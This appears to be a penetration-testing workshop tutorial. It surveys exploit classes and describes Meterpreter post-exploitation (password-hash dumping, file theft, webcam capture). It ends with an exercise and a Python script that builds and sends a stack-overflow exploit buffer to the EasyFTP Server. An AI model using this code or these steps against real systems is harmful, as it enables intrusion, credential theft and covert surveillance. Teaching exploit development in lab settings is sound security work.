
Advanced Exploitation Techniques - Part 4



Case Studies on Advanced Exploitation Techniques

Tutorial 1 – Hello world, some history

Welcome back. So far we have been studying systems and breaking into them by exploiting the vulnerabilities we discovered. In this module we go through several case studies, collected here as advanced techniques, so that we can gain more knowledge of exploit development and the surrounding areas of the field.

Some History

Buffer overflow exploits are extremely dangerous when they succeed and the attacker makes good use of the exploited vulnerability. A long time back, in 1988, there was a worm. It is still considered the first worm, since it gained so much media coverage and notoriety because of its effects. It was written by a student, Robert Tappan Morris, and one of the ways it spread was by exploiting a stack buffer overflow in the fingerd daemon. Estimates of the damage it caused ranged from hundreds of thousands to several million dollars.

We have explored egg hunters in some depth and have also gone through exploitation techniques such as buffer overflows. However, there is much more to explore in exploitation: there are many other ways of exploiting an application, although the way a vulnerability is detected does not differ entirely from what we have already seen.

So what other ways of exploitation, or other types of vulnerabilities, can lead to a system compromise, whether that means deploying rootkits, doing serious damage to the victim's machine or simply owning the box?

There are many other routes an attacker can use to gain access to the victim machine. The following vulnerability classes, if they can be exploited, can lead to the compromise of a system:

                    ● Heap Overflows
                    ● Format String
                    ● SQL Injections
                    ● Client Side Attacks
                    ● IE Exploitation

These names are probably familiar to you; they remain the most common classes and still cause serious damage to systems. Techniques like Trojan horses, social engineering and password attacks may still work, but nowadays these types of attacks on their own don't get you far in real-world hacking attempts.

The days when you could simply run a password attack and gain access to routers and Windows machines, or send a file that compromises the system, have passed. That is legacy.

However, personally, I have seen in live pen testing that the password for a Cisco router was still “cisco” and the password for a web application admin panel was still “admin”, so idiots are still working in the field of web development and network or system administration.

Sometimes you can exploit a vulnerability, but the payload you are using does not let you do more damage to the system or fully compromise it.

Let's turn our attention to the great payload and best-loved part of Metasploit, Meterpreter. We will exploit a known vulnerability and then explore the advanced options Meterpreter gives us.

Case Study – Meterpreter & PCManFTPD Vulnerability

We downloaded and installed the PCManFTPD server on a Windows XP machine and ran the Metasploit framework to look for an available exploit. The screen below shows the configured options for exploiting this vulnerability.



Okay, here you can see we have one Meterpreter session open on the victim machine. So what can we do now that the vulnerability is exploited? This is where it is worthwhile showing the power of Meterpreter. Below are the command groups available for us to play with on this system.

            ● Core Commands
            ● File System Commands
            ● Networking Commands
            ● System Commands
            ● User Interface Commands
            ● Webcam Commands
            ● Elevate Commands
            ● Password Database Commands
            ● Timestomp commands

Core Commands


File System Commands


Networking Commands


System Commands


User Interface Commands


Webcam Commands



Elevate, Password & Timestomp Commands


That is the power of this awesome Metasploit payload. Okay, so what can we do with it? We can dump the contents of the SAM database and crack the password hashes later, using Metasploit itself.

We can download or upload any files to and from the victim's system, and we can even take webcam snapshots and video. You can try and practice all of these commands on your own by simply exploiting any known vulnerability, as we have shown in this case.

Exploring Meterpreter is a detailed exercise. If you want to master Meterpreter and learn more about it, please post a workshop request on the forum and we will develop a dedicated workshop on Meterpreter and other key post-exploitation topics so that you can enhance your skills after the hack.

Case Study – Exploit Development & Metasploit

Some people still believe that Metasploit is only a penetration testing and hacking tool. It is indeed the most used and best maintained tool in ethical hacking and penetration testing, but it is not just for hacking into systems.

A security researcher uses this wonderful tool for exploit development as well. You might wonder how it can be used for exploit development, so here, as a bonus, we will run through a quick exploit development with Metasploit for the EasyFTP Server.


We will follow quick and short steps to show how this tool can be used for exploit development. As you have already seen at the beginning of the workshop, we used Metasploit for fuzzing, so I will not explain that again here. You have to do it on your own, and don't copy the required information from the published exploits. Below is an exercise for you to complete: develop an exploit for the known vulnerability in EasyFTP Server.

Exercise 1 – Find the rabbit’s foot

Step 1


Use Metasploit for fuzzing, find the point at which the application crashes, and post on the forum how you did it. Your main task in step one is finding the offset, so post the offset value you find. The offset itself is a property of the vulnerable binary; the addresses you observe along the way, such as where ESP points, may differ between machines.

You can download the vulnerable application from the link below. If you need any help practicing on the vulnerable application, please post on the forum so we can help you, but don't give up before trying on your own first.

Download Link: http://www.exploit-db.com/exploits/14402/

Step 2

Now arrange the stack and overwrite the EIP register. If you have read module one and understood the exploit development explained there, then I believe you should be able to do this with little effort. Then find where ESP points at the moment of the crash.

Post your story on the forum: how you located and overwrote EIP.

Step 3

Now you should have the following:

1 – Evil buffer that crashes the application
2 – Offset value at which EIP is overwritten
3 – ESP location at the time of the crash

Step 4

Get your shellcode ready; you can generate one with Metasploit or use the one I used in module 1.

Submit your success story on the forum.

Step 5

We have shown the high-level steps for developing the EasyFTP Server exploit. You can use any technique you want; for convenience you can use mona.py for everything, but do submit the techniques you used in developing the exploit.

And don't forget to submit your PoC code for others to learn from. I have developed one for you and will post it once anyone requests it. You can ask questions via the forum if you face any difficulty coding the PoC.
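Steps 1 to 4 above, worked through in code as an added example. This is neither the author's PoC nor the published EasyFTP exploit: it reimplements the two Metasploit helpers the exercise relies on (the cyclic pattern and the offset lookup), checks the return address and shellcode for bad characters, and assembles the final buffer. Everything target-specific is an assumption you replace with your own findings: the EIP value 0x41366941, the crash length of 1000 bytes, the return address 0x7C9D30D7 (a hypothetical JMP ESP), the 32-byte INT3 placeholder shellcode, the bad-character set, and the vulnerable FTP command, which this page does not name, so the sender takes it as a parameter.

```python
"""Exploit-development helpers for the EasyFTP exercise (added example).

Reimplements the Metasploit pattern_create / pattern_offset helpers used in
steps 1-3 and assembles the buffer of step 4.  Nothing here is taken from the
published EasyFTP exploit; the vulnerable command, return address and
shellcode below are placeholders to be replaced with your own findings.
"""
import socket
import struct
from string import ascii_lowercase, ascii_uppercase, digits

# Bytes an FTP command line cannot carry: NUL terminates C strings, CR/LF end
# the command.  Assumed for this example; confirm with your own bad-char test.
BAD_CHARS = {0x00, 0x0A, 0x0D}


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1...Zz9; unique up to 20280 bytes."""
    out = bytearray()
    for u in ascii_uppercase:
        for l in ascii_lowercase:
            for d in digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(eip, length=20280):
    """Offset of the four pattern bytes that landed in EIP.

    `eip` is either the register value as the debugger shows it (an int such
    as 0x41366941) or the raw 4 bytes.  x86 is little-endian, so an int is
    packed with '<I' before searching the pattern.
    """
    needle = struct.pack("<I", eip) if isinstance(eip, int) else bytes(eip)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("value %r not found in pattern" % needle)
    return idx


def find_bad_chars(data, bad=BAD_CHARS):
    """Sorted list of forbidden byte values present in `data`."""
    return sorted(set(data) & set(bad))


def build_exploit(offset, ret_addr, shellcode, total_len, nop_len=16):
    """Assemble [junk to EIP][ret addr][NOP sled][shellcode][padding].

    In the usual layout after the overflow (steps 2 and 3), ESP points just
    past the overwritten return address, so `ret_addr` should be the address
    of a JMP ESP (or equivalent); execution then slides down the NOPs into
    the shellcode.  Verify that ESP really points there on your own crash.
    """
    ret = struct.pack("<I", ret_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        bad = find_bad_chars(blob)
        if bad:
            raise ValueError("%s contains bad chars: %s" % (name, [hex(b) for b in bad]))
    buf = b"A" * offset + ret + b"\x90" * nop_len + shellcode
    if len(buf) > total_len:
        raise ValueError("payload (%d) exceeds crash length (%d)" % (len(buf), total_len))
    return buf + b"C" * (total_len - len(buf))


def send_ftp_command(host, port, command, argument, user=b"anonymous", password=b"anonymous"):
    """Log in and send `command argument`.

    Used for fuzzing (argument = pattern_create(n)) as well as for the final
    buffer (argument = build_exploit(...)).  The vulnerable command is not
    identified on this page, so it is passed in explicitly; if the overflow is
    in USER or PASS itself, drop the login lines.
    """
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)
        s.sendall(b"USER " + user + b"\r\n")
        s.recv(1024)
        s.sendall(b"PASS " + password + b"\r\n")
        s.recv(1024)
        s.sendall(command + b" " + argument + b"\r\n")
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""  # no reply: the server likely crashed (or ran our code)


if __name__ == "__main__":
    # Worked run with assumed values: the debugger showed EIP=0x41366941 after
    # sending pattern_create(1000), and 0x7C9D30D7 is a hypothetical JMP ESP.
    off = pattern_offset(0x41366941)  # -> 258
    shellcode = b"\xcc" * 32          # placeholder: INT3 breakpoints
    buf = build_exploit(off, 0x7C9D30D7, shellcode, total_len=1000)
    print("offset=%d buffer=%d bytes" % (off, len(buf)))
    # send_ftp_command("192.168.1.10", 21, b"COMMAND", buf)  # host and command are placeholders
```

Run the fuzzing stage by sending `pattern_create(n)` for increasing `n` until the server stops answering, then read EIP from the debugger and feed it to `pattern_offset`; because the pattern is unique, the offset comes out directly instead of by bisection. Replace the placeholder shellcode with real shellcode generated from Metasploit and re-run `build_exploit`, which refuses any return address or shellcode containing a bad character before anything is sent to the target.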
